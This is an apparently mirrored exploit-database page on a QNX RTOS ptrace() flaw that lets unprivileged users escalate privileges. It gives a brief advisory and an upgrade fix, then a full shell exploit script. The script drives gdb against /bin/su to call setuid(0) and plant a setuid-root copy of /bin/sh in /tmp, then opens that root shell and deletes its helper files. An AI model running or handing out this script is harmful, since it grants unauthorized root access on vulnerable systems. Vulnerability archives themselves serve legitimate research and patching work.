QNX 'ptrace()' Insecure - exploit.company

vendor:

QNX RTOS

by:

SecurityFocus

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: QNX RTOS

Affected Version From: QNX RTOS 6 prior to 6.4.0

Affected Version To: QNX RTOS 6 prior to 6.4.0

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

QNX ‘ptrace()’ Insecure

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

Mitigation:

Upgrade to QNX RTOS 6.4.0 or later

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4919/info

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0. 

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com 

echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su  < badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh